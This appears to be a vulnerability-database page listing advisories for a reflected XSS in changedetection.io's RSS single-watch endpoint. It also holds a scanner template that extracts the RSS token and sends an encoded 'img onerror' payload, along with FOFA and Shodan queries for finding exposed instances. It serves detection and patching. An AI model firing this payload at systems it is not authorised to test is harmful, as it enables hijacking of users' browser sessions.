| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2026-27645 | 25 Feb 2026 04:06 | – | attackerkb |
| CVE-2026-27645 | 23 Feb 2026 20:40 | – | circl |
| changedetection.io security vulnerability | 25 Feb 2026 00:00 | – | cnnvd |
| CVE-2026-27645 | 25 Feb 2026 04:06 | – | cve |
| CVE-2026-27645 changedetection.io Vulnerable to Reflected XSS in RSS Single Watch Error Response | 25 Feb 2026 04:06 | – | cvelist |
| EUVD-2026-8621 | 25 Feb 2026 19:07 | – | euvd |
| changedetection.io Vulnerable to Reflected XSS in RSS Single Watch Error Response | 25 Feb 2026 19:07 | – | github |
| CVE-2026-27645 | 25 Feb 2026 05:17 | – | nvd |
| CVE-2026-27645 changedetection.io Vulnerable to Reflected XSS in RSS Single Watch Error Response | 25 Feb 2026 04:06 | – | osv |
| GHSA-MW8M-398G-H89W changedetection.io Vulnerable to Reflected XSS in RSS Single Watch Error Response | 25 Feb 2026 19:07 | – | osv |
```yaml
id: CVE-2026-27645

info:
  name: Changedetection.io RSS Single Watch - Cross-Site Scripting
  author: 0x_Akoko
  severity: medium
  description: |
    changedetection.io < 0.54.1 contains a reflected XSS caused by unescaped reflection of the UUID path parameter in the RSS single-watch endpoint's error response, letting remote attackers execute JavaScript in the victim's browser; exploitation requires the victim to visit a crafted URL.
  impact: |
    Attackers can execute arbitrary JavaScript in users' browsers, leading to session hijacking or other client-side attacks.
  remediation: |
    Update to version 0.54.1 or later.
  reference:
    - https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-mw8m-398g-h89w
    - https://github.com/dgtlmoon/changedetection.io/commit/a385c89abf44b52fcfa20c7c6a6dd3047c4c1eb5
    - https://nvd.nist.gov/vuln/detail/CVE-2026-27645
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-27645
    cwe-id: CWE-79
    epss-score: 0.00445
    epss-percentile: 0.35714
  metadata:
    max-request: 2
    verified: true
    fofa-query: title="Change Detection"
    shodan-query: http.title:"Change Detection"
  tags: cve,cve2026,xss,changedetection,rss

# Step 1 fingerprints the application and extracts the RSS token from the main page;
# step 2 only runs if step 1 matched.
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "rss?token=", "Change Detection")'
        internal: true

    extractors:
      - type: regex
        name: rss_token
        part: body
        group: 1
        regex:
          - 'rss\?token=([a-f0-9]{16,64})'
        internal: true

  # Step 2 requests the single-watch RSS feed with a non-UUID path segment and
  # checks that the 404 error page reflects it unescaped into HTML.
  - method: GET
    path:
      - "{{BaseURL}}/rss/watch/%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E?token={{rss_token}}"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 404'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "<img src=x onerror=alert(document.domain)>", "Watch with UUID")'
        condition: and
# digest: 4a0a0047304502200486cc763ba8fb628a0da7dd187334ca160ae7f96c11938ccfed80091810d32a022100b354bd4f128d7c40a6c03a6eaf88a9a3636172039b57048a47e4986d8876e5c6:922c64590222798bb761d5b6d8e72950
```